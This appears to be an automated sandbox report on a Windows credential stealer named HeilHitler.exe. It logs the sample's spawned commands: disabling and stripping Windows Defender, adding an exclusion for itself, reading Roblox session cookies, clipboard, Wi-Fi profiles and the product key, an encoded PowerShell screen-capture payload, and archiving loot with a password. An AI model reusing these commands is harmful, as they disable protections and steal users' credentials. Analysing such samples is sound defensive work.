               Source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
               Source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
               Source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
               Source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
               Source: HeilHitler.exe | ReversingLabs: Detection: 47%
               Source: HeilHitler.exe | String found in binary or memory: set-addPolicy
               Source: HeilHitler.exe | String found in binary or memory: id-cmc-addExtensions
               Source: HeilHitler.exe | String found in binary or memory: can't send non-None value to a just-started generator
               Source: HeilHitler.exe | String found in binary or memory: --help
               Source: HeilHitler.exe | String found in binary or memory: --help
               Source: C:\Users\user\Desktop\HeilHitler.exe | File read: C:\Users\user\Desktop\HeilHitler.exe
               Source: unknown | Process created: C:\Users\user\Desktop\HeilHitler.exe "C:\Users\user\Desktop\HeilHitler.exe"
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Users\user\Desktop\HeilHitler.exe "C:\Users\user\Desktop\HeilHitler.exe"
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'"
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
               Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbg
AoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\getmac.exe getmac
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
               Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D0C.tmp" "c:\Users\user\AppData\Local\Temp\0qdpbrpq\CSC1A48FA887436480A8B41407A32798B3.TMP"
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
               Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
               Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Users\user\Desktop\HeilHitler.exe "C:\Users\user\Desktop\HeilHitler.exe"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Users\user\Desktop\HeilHitler.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D0C.tmp" "c:\Users\user\AppData\Local\Temp\0qdpbrpq\CSC1A48FA887436480A8B41407A32798B3.TMP"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
